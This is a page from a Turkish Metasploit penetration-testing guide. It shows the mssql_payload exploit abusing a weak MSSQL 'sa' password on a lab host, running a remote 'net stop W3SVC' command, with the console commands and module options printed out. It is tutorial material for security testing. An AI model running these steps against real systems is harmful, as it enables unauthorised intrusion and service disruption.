Metasploit framework-Kullanim rehberi 0.8
Metasploit framework-Kullanim rehberi 0.8
Metasploit framework-Kullanim rehberi 0.8
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
<strong>Metasploit</strong> Framework ile Sistem Sızma Testleri Aralık 2012<br />
Hazırlanan örnekte hedefin Microsoft IIS (TCP port 80) ve Microsoft SQL (TCP port<br />
1433) servislerine erişim sağlanabilmektedir, diğer portlar ve servislere erişim olmadığı<br />
varsayılacaktır. Öncelikle connect komutu ile Microsoft IIS servisinin etkin olduğu<br />
doğrulanır, sonrasında Microsoft SQL servisinin yönetici şifresinden kaynaklanan<br />
güvenlik açığı ile hedef sistemde “net stop W3SVC” komutu çalıştırılır.<br />
msf exploit(mssql_payload) > connect -z 192.168.1.32 80<br />
[*] Connected to 192.168.1.32:80<br />
msf exploit(mssql_payload) > set PAYLOAD windows/exec<br />
PAYLOAD => windows/exec<br />
msf exploit(mssql_payload) > set CMD "net stop W3SVC"<br />
CMD => net stop W3SVC<br />
msf exploit(mssql_payload) > show options<br />
Module options (exploit/windows/mssql/mssql_payload):<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
METHOD cmd yes Which payload delivery method to use<br />
(ps, cmd, or old)<br />
PASSWORD PASSWORD no The password for the specified<br />
username<br />
RHOST 192.168.1.32 yes The target address<br />
RPORT 1433 yes The target port<br />
USERNAME sa no The username to authenticate as<br />
USE_WINDOWS_AUTHENT false yes Use windows authentification<br />
(requires DOMAIN option set)<br />
Payload options (windows/exec):<br />
Name Current Setting Required Description<br />
---- --------------- -------- -----------<br />
CMD net stop W3SVC yes The command string to execute<br />
EXITFUNC process yes Exit technique: seh, thread, process, none<br />
Exploit target:<br />
Id Name<br />
-- ----<br />
0 Automatic<br />
GamaSEC Bilgi Güvenliği Denetim ve Danışmanlık Servisleri Sayfa 110